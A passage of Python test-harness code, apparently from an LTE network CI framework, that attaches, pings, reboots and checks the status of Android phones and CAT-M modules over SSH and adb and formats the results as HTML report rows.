attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
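			# Query signal quality: the CESQ indices reported by the module are converted below
			# into RSRQ (dB) and RSRP (dBm) values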
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.prematureExit = True
return
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
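			# Allow 1.5 seconds per requested ping (taken from the -c option) as the command timeout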
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE_common(self, device_id, statusQueue, lock):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
time.sleep(0.5)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
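		# Attach at most nbMaxUEtoAttach devices (-1 means attach them all), each one in its own process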
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
self.UEDevicesStatus[nb_ue_to_connect] = UE_STATUS_ATTACHING
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
return
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
cnt = 0
while cnt < len(self.UEDevices):
if self.UEDevicesStatus[cnt] == UE_STATUS_ATTACHING:
self.UEDevicesStatus[cnt] = UE_STATUS_ATTACHED
cnt += 1
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = UE_STATUS_DETACHED
cnt += 1
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
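			# Poll for up to 180 seconds until the telephony registry is readable again and, if the UE
			# was attached before the reboot, until it reports mDataConnectionState == 2 again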
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataDisableUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			# disable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data disable', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Disabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataDisableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DataDisableUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def DataEnableUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data enable', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Enabled Data Service\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DataEnableUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DataEnableUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('adb devices', '\$', 15)
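		# Extract the serial number of every device listed by 'adb devices' from the pexpect buffer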
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
if len(self.UEDevicesStatus) == 0:
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
cnt += 1
self.close()
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
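		# CAT-M modules are detected through their FT2232C USB-to-serial bridge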
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def CheckUEStatus_common(self, lock, device_id, statusQueue):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry', '\$', 15)
result = re.search('mServiceState=(?P<serviceState>[0-9]+)', str(self.ssh.before))
serviceState = 'Service State: UNKNOWN'
if result is not None:
lServiceState = int(result.group('serviceState'))
if lServiceState == 3:
serviceState = 'Service State: RADIO_POWERED_OFF'
if lServiceState == 1:
serviceState = 'Service State: OUT_OF_SERVICE'
if lServiceState == 0:
serviceState = 'Service State: IN_SERVICE'
if lServiceState == 2:
serviceState = 'Service State: EMERGENCY_ONLY'
result = re.search('mDataConnectionState=(?P<dataConnectionState>[0-9]+)', str(self.ssh.before))
dataConnectionState = 'Data State: UNKNOWN'
if result is not None:
lDataConnectionState = int(result.group('dataConnectionState'))
if lDataConnectionState == 0:
dataConnectionState = 'Data State: DISCONNECTED'
if lDataConnectionState == 1:
dataConnectionState = 'Data State: CONNECTING'
if lDataConnectionState == 2:
dataConnectionState = 'Data State: CONNECTED'
if lDataConnectionState == 3:
dataConnectionState = 'Data State: SUSPENDED'
result = re.search('mDataConnectionReason=(?P<dataConnectionReason>[0-9a-zA-Z_]+)', str(self.ssh.before))
dataConnectionReason = 'Data Reason: UNKNOWN'
if result is not None:
dataConnectionReason = 'Data Reason: ' + result.group('dataConnectionReason')
lock.acquire()
logging.debug('\u001B[1;37;44m Status Check (' + str(device_id) + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + serviceState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionState + '\u001B[0m')
logging.debug('\u001B[1;34m ' + dataConnectionReason + '\u001B[0m')
statusQueue.put(0)
statusQueue.put(device_id)
qMsg = serviceState + '\n' + dataConnectionState + '\n' + dataConnectionReason
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckStatusUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
lock = Lock()
status_queue = SimpleQueue()
for device_id in self.UEDevices:
p = Process(target = self.CheckUEStatus_common, args = (lock,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('curl http://localhost:9999/stats | jq \'.\' > log/check_status_' + self.testCase_id + '.log 2>&1', '\$', 5)
self.command('cat log/check_status_' + self.testCase_id + '.log | jq \'.eNB_config[0].UE\' | grep -c rnti | sed -e "s#^#Nb Connected UE = #"', '\$', 5)
result = re.search('Nb Connected UE = (?P<nb_ues>[0-9]+)', str(self.ssh.before))
passStatus = True
if result is not None:
nb_ues = int(result.group('nb_ues'))
htmlOptions = 'Nb Connected UE(s) to eNB = ' + str(nb_ues)
logging.debug('\u001B[1;37;44m ' + htmlOptions + ' \u001B[0m')
if self.expectedNbOfConnectedUEs > -1:
if nb_ues != self.expectedNbOfConnectedUEs:
passStatus = False
else:
htmlOptions = 'N/A'
self.close()
else:
passStatus = True
htmlOptions = 'N/A'
if (status_queue.empty()):
self.CreateHtmlTestRow(htmlOptions, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
check_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
check_status = False
device_id = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
html_queue.put(html_cell)
if check_status and passStatus:
self.CreateHtmlTestRowQueue(htmlOptions, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(htmlOptions, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
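		# OAI UE case: read the IP address directly from the oaitun_ue1 tunnel interface on the UE host;
		# otherwise query each attached Android device over adb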
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr:(?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)', str(self.ssh.before))
if result is not None:
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + self.UEDevices[0] + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
self.UEIPAddresses.append(UE_IPAddress)
else:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
ue_ip_status -= 1
self.close()
return ue_ip_status
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
idx = 0
for device_id in self.UEDevices:
if self.UEDevicesStatus[idx] != UE_STATUS_ATTACHED:
idx += 1
continue
count = 0
while count < 4:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ip addr show | grep rmnet', '\$', 15)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
logging.debug('\u001B[1mUE (' + device_id + ') IP Address ' + UE_IPAddress + ': has already been allocated to another device !' + '\u001B[0m')
ue_ip_status -= 1
continue
self.UEIPAddresses.append(UE_IPAddress)
idx += 1
self.close()
return ue_ip_status
def ping_iperf_wrong_exit(self, lock, UE_IPAddress, device_id, statusQueue, message):
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(message)
lock.release()
def Ping_common(self, lock, UE_IPAddress, device_id, statusQueue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def PingNoS1_wrong_exit(self, qMsg):
html_queue = SimpleQueue()
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
def PingNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
if ping_from_eNB is not None:
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
else:
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
try:
if ping_from_eNB is not None:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
else:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
